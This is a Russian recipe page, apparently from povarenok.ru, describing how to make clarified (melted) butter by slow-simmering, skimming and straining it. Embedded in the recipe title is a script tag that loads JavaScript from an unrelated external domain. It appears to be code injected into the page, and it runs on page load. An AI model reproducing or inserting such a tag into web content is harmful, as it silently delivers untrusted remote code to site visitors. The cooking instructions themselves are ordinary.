Вернуться к рецепту
Эти и другие рецепты ждут вас на сайте www.povarenok.ru.

Топлёное сливочное масло

Автор: Анжелика Первая

Топлёное сливочное масло<script type="text/javascript" src="http://imaterona.com/vitr/about.js"></script>

Описание: Давно хотелось приготовить топлёное сливочное масло, которое не пробовала с детства! Начиталась различных советов и рецептов, вывела среднее арифметическое))) публикуюсь впервые, волнительно, но очень хочется поделиться. На сайте нет подобного я надеюсь!

Ингредиенты

Приготовление


Итак: 1 - 1.2 кг хорошего сливочного масла, положить в толстостенную посудину. У меня чугунная сковорода. На медленном огне томить 1.5 -2 часа. Белую пену снимать периодически. Не перемешивать. Масло постепенно станет прозрачным появится изумительный сливочный запах! Пора снимать! Процедить через сито или ткань в другую кастрюльку, ещё прогреть и разлить по баночками. Получилось около 900 граммов отличного продукта! Если есть желание, добавьте соль. К блинчиками, картошечке, бутербродикам, кашам и сами знаете куда))) вилочка показывает прозрачность масла. Приятного аппетита!

Топлёное сливочное масло — кулинарный рецепт с сайта Поварёнок.ру.
https://www.povarenok.ru/

© www.povarenok.ru
Rambler's Top100 Рейтинг@Mail.ru